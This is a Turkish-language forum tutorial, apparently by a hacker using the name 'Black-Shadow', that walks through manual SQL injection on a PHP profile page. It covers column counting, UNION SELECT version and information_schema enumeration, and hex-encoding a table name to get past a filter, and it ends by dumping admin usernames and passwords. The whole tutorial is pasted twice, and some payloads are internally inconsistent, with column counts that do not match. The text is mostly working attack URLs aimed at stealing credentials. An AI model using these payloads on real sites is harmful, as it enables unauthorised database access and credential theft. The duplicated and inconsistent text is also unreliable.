Anlatım: Black-Shadow
SQL İnjection Anlatımı:
Arkadaşlar Anlatım Tamamen Bana Aittir Haydi Başlayalım Bu Açığı Kesinlikle Küçük Görmeyin Bu Açık Devlet Sitesinde Bile
Olabilecek Tür’den Bir Açık.
MySQL İnjection’dan Başlıyalım
http://blackshadow.com/profile.php?id=1’
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’\\\\"’ at line 1
Hatamız Gelirse Bilin ki Ahanda Sql Açığı Sql Açığını Tespit Etmek İçin ’a ’ Koymanız Yeterli.
Gelin Kolon Sayımızı Öğrenelim Ne Dersiniz
http://www.blackshadow.com/profile.php?id=1+order+by+31
31 Yazdık Ve Hata Verdi.Şimdi Hata Vermeyene Kadar Aşşağı ineceğiz.
http://www.blackshadow.com/profile.php?id=1+order+by+31
http://www.blackshadow.com/profile.php?id=1+order+by+30
http://www.blackshadow.com/profile.php?id=1+order+by+29
http://www.blackshadow.com/profile.php?id=1+order+by+28
28 De Ekran Düzeldi Demekki Kolon Sayımız 28
Şimdi Kolonları Ekrana Yansıtalım.
http://www.blackshadow.com/profile.p...24,25,26,27,28
Kolon Sayımız 28 Olduğu için union+select+...28 e kadar yazıyoruz.
Ekrana 5,9 Kolonları Yansıdığını Varsayarak Devam Ediyoruz.
Ha Arkadaşlar Anaa Baktınız Yansımadı Hiiç Korkmayın (--)Yapın. Buna Bypass Diyebilirsiniz.
Şimdi Version İsteyelim.
http://www.blackshadow/profile.php?id=-1 union select 1,...,version(),15,16,17,18,19,20 ,21,22,23,25,26,27
14.0.91mm-log Yazdırdık.Hangi Numara İle Başlarsa Versionu odur..Yani 14.
Şimdi İse Database den Tabloları alalım.
http://www.blackshadow.com/profile.php?id=-1 union select 1,......,group_concat(table_name),15,16.... from information_schema.tables where table_schema=database()
Tablolarımız Bunlar Olsun :
+---------------------+
| admin|
| kullanıcı|
| dosya_isimleri |
| externallinks |
| haber|
| araba |
| spiker |
| konuklar |
| presskit |
+---------------------+
adminuser = Bunu Gördüysen Hedefe Yaklaştın Demektir.
Şimdi Tablodan Column’ları Çekelim.
http://www.blackshadow.com/profile.php?id=-1 union select 1,.....,group_concat(column_name),15,16.... from information_schema.columns where table_schema=database() and table_name='adminuser'
Bu Şekilde Yazdık Ama Hata Verdi.Çünkü adminuser den Kolonları İstediğimizde Bi Tür Engel Çıktı.Yani Yansıtamadık.Bunu Gidermek İçin adminuser i Hex leyeceğiz.
Hex Converter
http://www.dolcevie.com/js/converter.html Girin.
Sonucumuz 61:64:6d:69:6e:75:73:65:72 Bu Şekilde Çıkacak Ama Biz Onu 0x61646d696e75736572 Bu Şekilde Yapacağız.Yani iki noktaralı silip Başına *** Koyacağız.
http://www.blackshadow.com/profile.p.....6e75736572--
Evet Bu Şekilde.Şimdi Verilerimizi Çekelim.
username
password
Olsun
http://blackshadow.com/profile.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,username,14,15,password,17 from adminuser--
Ve Bitişi Yapalım :
SQL: Kullanıcı Adı
İnjection : Şifre
Arkadaşlar Eksiğim Kusurum Var ise Hakkınızı Helal Edin Umarım Doğru Bir Makale Olmuştur
SQL İnjection Anlatımı:
Arkadaşlar Anlatım Tamamen Bana Aittir Haydi Başlayalım Bu Açığı Kesinlikle Küçük Görmeyin Bu Açık Devlet Sitesinde Bile
Olabilecek Tür’den Bir Açık.
MySQL İnjection’dan Başlıyalım
http://blackshadow.com/profile.php?id=1’
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’\\\\"’ at line 1
Hatamız Gelirse Bilin ki Ahanda Sql Açığı Sql Açığını Tespit Etmek İçin ’a ’ Koymanız Yeterli.
Gelin Kolon Sayımızı Öğrenelim Ne Dersiniz
http://www.blackshadow.com/profile.php?id=1+order+by+31
31 Yazdık Ve Hata Verdi.Şimdi Hata Vermeyene Kadar Aşşağı ineceğiz.
http://www.blackshadow.com/profile.php?id=1+order+by+31
http://www.blackshadow.com/profile.php?id=1+order+by+30
http://www.blackshadow.com/profile.php?id=1+order+by+29
http://www.blackshadow.com/profile.php?id=1+order+by+28
28 De Ekran Düzeldi Demekki Kolon Sayımız 28
Şimdi Kolonları Ekrana Yansıtalım.
http://www.blackshadow.com/profile.p...24,25,26,27,28
Kolon Sayımız 28 Olduğu için union+select+...28 e kadar yazıyoruz.
Ekrana 5,9 Kolonları Yansıdığını Varsayarak Devam Ediyoruz.
Ha Arkadaşlar Anaa Baktınız Yansımadı Hiiç Korkmayın (--)Yapın. Buna Bypass Diyebilirsiniz.
Şimdi Version İsteyelim.
http://www.blackshadow/profile.php?id=-1 union select 1,...,version(),15,16,17,18,19,20 ,21,22,23,25,26,27
14.0.91mm-log Yazdırdık.Hangi Numara İle Başlarsa Versionu odur..Yani 14.
Şimdi İse Database den Tabloları alalım.
http://www.blackshadow.com/profile.php?id=-1 union select 1,......,group_concat(table_name),15,16.... from information_schema.tables where table_schema=database()
Tablolarımız Bunlar Olsun :
+---------------------+
| admin|
| kullanıcı|
| dosya_isimleri |
| externallinks |
| haber|
| araba |
| spiker |
| konuklar |
| presskit |
+---------------------+
adminuser = Bunu Gördüysen Hedefe Yaklaştın Demektir.
Şimdi Tablodan Column’ları Çekelim.
http://www.blackshadow.com/profile.php?id=-1 union select 1,.....,group_concat(column_name),15,16.... from information_schema.columns where table_schema=database() and table_name='adminuser'
Bu Şekilde Yazdık Ama Hata Verdi.Çünkü adminuser den Kolonları İstediğimizde Bi Tür Engel Çıktı.Yani Yansıtamadık.Bunu Gidermek İçin adminuser i Hex leyeceğiz.
Hex Converter
http://www.dolcevie.com/js/converter.html Girin.
Sonucumuz 61:64:6d:69:6e:75:73:65:72 Bu Şekilde Çıkacak Ama Biz Onu 0x61646d696e75736572 Bu Şekilde Yapacağız.Yani iki noktaralı silip Başına *** Koyacağız.
http://www.blackshadow.com/profile.p.....6e75736572--
Evet Bu Şekilde.Şimdi Verilerimizi Çekelim.
username
password
Olsun
http://blackshadow.com/profile.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,username,14,15,password,17 from adminuser--
Ve Bitişi Yapalım :
SQL: Kullanıcı Adı
İnjection : Şifre
Arkadaşlar Eksiğim Kusurum Var ise Hakkınızı Helal Edin Umarım Doğru Bir Makale Olmuştur
